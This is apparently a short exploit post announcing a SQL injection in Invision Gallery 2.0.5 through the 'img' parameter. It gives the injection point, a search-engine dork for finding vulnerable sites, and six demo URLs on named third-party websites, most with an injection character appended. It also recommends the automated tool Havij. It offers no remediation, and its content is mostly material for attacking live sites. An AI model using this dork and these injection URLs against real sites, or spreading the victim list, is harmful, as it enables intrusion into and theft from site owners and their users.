Invision Gallery version 2.0.5 suffers from a remote SQL injection vulnerability.
ed37d1d30bc5e32cffffe67f79b1076b898251abcbe19d9253a19c72021169a4
##############
# Exploit Title : Invision Gallery SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# software Homepage: www.invisionpower.com/apps/gallery/
#
# Home : ww.Ashiyane.org
#
# Security Risk : High - SQL Injection
#
# version : 2.0.5
#
# Dork : Invision Gallery 2.0.5 © 2013 IPS, Inc. inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img=
#
##############
#location: site/index.php?automodule=gallery&cmd=si&img=[SQL]
# or site/act=module&module=gallery&cmd=si&img=[SQL]
#
#
#DEMO:
#
# www.sgheadphones.net/index.php?act=module&module=gallery&cmd=si&img=448%27
#
# www.rfdf.ru/forum/index.php?act=module&module=gallery&cmd=si&img=698%27
#
# www.bamburakentaja.com/forums/index.php?act=module&module=gallery&cmd=si&img=41%27
#
# forum.lacrimosa.ws/index.php?automodule=gallery&cmd=si&img=42%27
#
# www.chaos.su/forum/index.php?automodule=gallery&cmd=si&img=3
#
# ngevacorp.freehostia.com/index.php?automodule=gallery&cmd=si&img=726%27
#
##############
# [Inject with Havij or inject manually]
##############
#Greetz to: My Lord ALLAH
##############
#
#Amirh03in
#
##############